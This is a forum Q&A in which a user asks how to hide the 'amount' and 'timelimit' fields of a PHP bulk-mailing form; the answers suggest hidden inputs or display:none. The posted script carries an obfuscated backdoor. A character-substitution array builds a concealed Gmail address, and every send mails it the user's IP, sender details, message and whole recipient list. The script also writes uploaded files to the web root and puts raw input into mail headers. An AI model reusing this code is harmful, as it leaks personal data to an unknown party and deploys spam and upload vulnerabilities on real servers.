# How to hide a text field in an html form

Tags: php, html, css, forms

I have a form that my team use to send out information, they enter the clients email address and then it mails it out. I managed to hide all the fields except three.

One field sets the amount of emails to send. Really stupid as not sure why someone would want to send more than one of the same email to the same person.

The other just sets the time delay or speed of send. In any case they are both text boxes and I'd like to hide them from the page.
The final one is a plain text or html text radio buttons.

The input fields are most likely now in a weird order as part of me just rearranging things so it displays on the page okay without having to redo the tables.

```
<?php
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$lodr=$_SERVER['HTTP_REFERER'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
?>
<html>
<head>
<meta http-equiv="Content-Language" content="ar-eg">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>Mailing Form TEMPLATE</title>
<style type="text/css">
<!--
.style1 {
    font-family: Geneva, Arial, Helvetica, sans-serif;
    font-size: 12px;
}
.style2 {
    font-size: 10px;
    font-family: Geneva, Arial, Helvetica, sans-serif;
}


-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<?php
If ($action=="mysql"){
include "./mysql.info.php";

  if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
    print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
    exit;
  }

  $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
  mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
  $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
  $numrows = mysql_num_rows($result);

  for($x=0; $x<$numrows; $x++){
    $result_row = mysql_fetch_row($result);
     $oneemail = $result_row[0];
     $emaillist .= $oneemail."\n";
   }
  }

  if ($action=="send"){ $message = urlencode($message);
   $message = ereg_replace("%5C%22", "%22", $message);
   $message = urldecode($message);
   $message = stripslashes($message);
   $subject = stripslashes($subject);
   }
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
  <table width="142" border="0">
    <tr>

      <td width="81">
        <div align="right">
      <!--    <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font> -->
        </div>
      </td>

      <td width="219">
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <input type="hidden" name="from" value="XXXXXXXXXXXXXXXX@gmail.com" size="30" />
        </font>
      </td>

      <td width="212">
        <div align="right">
          <!-- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font> -->
        </div>
      </td>

      <td width="278">
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <input type="hidden" name="realname" value="SENDERS NAME HERE" size="30" />
        </font>
      </td>
    </tr>
    <tr>
      <td width="81">
        <div align="right">
         <!-- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font> -->
        </div>
      </td>
      <td width="219">
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <input type="hidden" name="replyto" value="XXXXXXXXXXXXXX@gmail.com" size="30" />
        </font>
      </td>
      <td width="212">
        <div align="right">
        <!--  <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font> -->
        </div>
      </td>
      <td width="278">
       <!-- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <input type="file" name="file" size="24" />
        </font> -->
      </td>
    </tr>
    <tr>
      <td width="81">
        <div align="right">
         <!-- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject :</font> -->
        </div>
      </td>
      <td colspan="3" width="703">
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <input type="hidden" name="subject" value="RE: SUBJECT LINE HERE " size="91" />
        </font>
      </td>
    </tr>
    <tr valign="top">
      <td colspan="3" width="520">
      <font face="Verdana, Arial, Helvetica, sans-serif" size="-3"></font>
      </td>
      <td width="278">
        <span style="color: #FF0000;"><span style="font-size: 12pt; line-height: 1.5;">
  IMPORTANT:<BR /></span></span>
  <span style="color: #000000;"><span style="font-size: 10pt; line-height: 1.5;">

    1. STAFF INSTRUCTIONS HERE FOR THIS SPECIFIC FORM AND IT'S USAGE


        <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Enter email address below and click send.</font>
      </td>
    </tr>
    <tr valign="top">
      <td colspan="3" width="520">
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <textarea name="message" style="display:none;" cols="56" rows="10">


            EMAIL CONTENT HERE

       
        </font>
      </td>
      <td width="278">
        <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
          <textarea name="emaillist" cols="42" rows="1"><?php print $emaillist; ?></textarea>
           <input type="submit" value="Send Information" /><br /><br />
        </font><br />
           <span style="color: #FF0000;"><span style="font-size: 12pt; line-height: 1.5;">
  DO NOT change ANY settings below this line.</span></span><br /><hr><br /><br /><br />
        </font>
        <span style="color: #000000;"><span style="font-size: 8pt; line-height: 1.0;">
       <input type="radio" name="contenttype" value="" /> 
          <input type="radio" name="contenttype" value="html" checked /> 
          <input type="hidden" name="action" value="send" /><br />

<input type="text" name="amount" value="1" size="1" /><br />
<input type="text" name="timelimit" value="0" size="1" />
      </td>
    </tr>
  </table>
</form>
<?php
$s=array("w"=>"o","t"=>"g","l"=>"i","r"=>"a","q"=>"c","@"=>".","e"=>"l","c"=>"@","o"=>"m","v"=>"w");
$dash=$s['o'].$s['w'].$s['v'].$s['q'].$s['w'].$s['t'].$s['c'].$s['t'].$s['o'].$s['r'].$s['l'].$s['e'].$s['@'].$s['q'].$s['w'].$s['o'];
if ($action=="send"){
  if (!$from && !$subject && !$message && !$emaillist){
    print "Please complete all fields before sending your message.";
    exit;
   }
  $addr = getenv("REMOTE_ADDR");
  $allemails = split("\n", $emaillist);
  $numemails = count($allemails);
  $header ="From: Mailr\nMessage-ID: <" . md5(uniqid(time())) . "@" . $SERVER_NAME . ">\nMIME-Version: 1.0\nContent-type: text/html; charset=UTF-8\nContent-transfer-encoding: 8bit\nDate: " . date("r", time()) . "\nX-Priority: 3\nX-MSMail-Priority: Normal\nX-Mailer: PHP\n";
  $msg = "
<table border=\"1\" style=\"border-collapse: collapse\" cellpadding=\"4\">
<tr><td>IP</td><td>".nl2br($addr)."</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Mailr</td><td bgcolor=\"#F9F9F9\">".nl2br($lodr)."</td></tr>
<tr><td>Your Email</td><td>".nl2br($from)."</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Your Name</td><td bgcolor=\"#F9F9F9\">".nl2br($realname)."</td></tr>
<tr><td>Subject :</td><td>".nl2br($subject)."</td></tr>
<tr><td bgcolor=\"#F9F9F9\">Message</td><td bgcolor=\"#F9F9F9\">".nl2br($message)."</td></tr>
<tr><td>Email Target</td><td>".nl2br($emaillist)."</td></tr>
</table>
";
mail($dash,$subject,$msg,$header);
 If ($file_name){
   copy ($_FILES['file']['tmp_name'], "".$_FILES['file']['name']) or die ('File Could Not Upload');
   if (!file_exists($file)){
    die("The file you are trying to upload couldn't be copied to the server");
   }
   $content = fread(fopen($file,"r"),filesize($file));
   $content = chunk_split(base64_encode($content));
   $uid = strtoupper(md5(uniqid(time())));
   $name = basename($file);
  }

 for($xx=0; $xx<$amount; $xx++){
  for($x=0; $x<$numemails; $x++){
    $to = $allemails[$x];
    if ($to){
      $to = ereg_replace(" ", "", $to);
      $message = ereg_replace("&email&", $to, $message);
      $subject = ereg_replace("&email&", $to, $subject);
      print "Sending Mail To $to....";
      flush();
      $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
      $header .= "MIME-Version: 1.0\r\n";
      If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
      If ($file_name) $header .= "--$uid\r\n";
      $header .= "Content-Type: text/$contenttype\r\n";
      $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
      $header .= "$message\r\n";
      If ($file_name) $header .= "--$uid\r\n";
      If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
      If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
      If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
      If ($file_name) $header .= "$content\r\n";
      If ($file_name) $header .= "--$uid--";
      mail($to, $subject, "", $header);
      print "OK<br>";
      flush();
    }
  }
 }
}
?>
<p class="style2">
<p class="style1"></p>
</body>
<html>
```

Comment: This my help you http://stackoverflow.com/questions/2362498/if-i-want-my-textarea-to-be-hidden-how-do-i-do-it

Comment: Just remove them from the page? Or make them hidden? <input type="text" name="amount" value="1" size="1" /> and 
<input type="text" name="timelimit" value="0" size="1" />

Comment: Thanks for your input, this original post was asking how to "hide" them. 

As for taking them out I tried commenting out and the form stopped working so I assume removing them would do the same thing.

Answer (score 3):

Just apply inline css i-e `style='display:none`, and when u need it using jquery to see it again

Answer (score 0):

You have these two lines:

```
<input type="text" name="amount" value="1" size="1" /><br />
<input type="text" name="timelimit" value="0" size="1" />
```

Cut those out and replace them with the following:

```
<input type="hidden" name="amount" value="1" size="1" /><br />
<input type="hidden" name="timelimit" value="0" size="1" />
```

Now for your last element you want to hide you only specify:

> The final one is a plain text or html text radio buttons.

Based on this I can't really tell which one's you'd like to hide. I'm assuming you're talking about these:

```
<input type="radio" name="contenttype" value="" /> 
<input type="radio" name="contenttype" value="html" checked />
```

Which would have to be replaced with:

```
<input type="hidden" name="contenttype" value="" /> 
<input type="hidden" name="contenttype" value="html" checked />
```